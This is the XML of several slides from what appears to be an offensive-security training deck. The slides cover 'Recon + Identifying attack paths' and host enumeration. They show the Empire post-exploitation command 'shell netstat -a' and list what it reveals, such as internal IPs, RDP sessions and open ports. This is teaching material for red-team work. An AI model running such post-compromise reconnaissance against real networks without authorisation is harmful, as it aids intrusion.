              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Level 3: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recon + Identifying attack paths</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354519697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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074BDA6-3517-4785-8369-537D1A21E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076179" y="2447778"/>
            <a:ext cx="5444196" cy="4097824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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87490060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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074BDA6-3517-4785-8369-537D1A21E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076179" y="2447778"/>
            <a:ext cx="5444196" cy="4097824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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44986563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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074BDA6-3517-4785-8369-537D1A21E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076179" y="2447778"/>
            <a:ext cx="5444196" cy="4097824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="47625"/>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17990600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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8421718" y="1657721"/>
            <a:ext cx="3799825" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Empire CMD:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      shell netstat -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>     :::INFO:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Local Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Internal Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{697FCC31-58BE-4DDC-A670-75CE9ADAE792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1517117"/>
            <a:ext cx="8384867" cy="5028485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074BDA6-3517-4785-8369-537D1A21E2E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076179" y="2447778"/>
            <a:ext cx="5444196" cy="4097824"/>
          </a:xfrm>
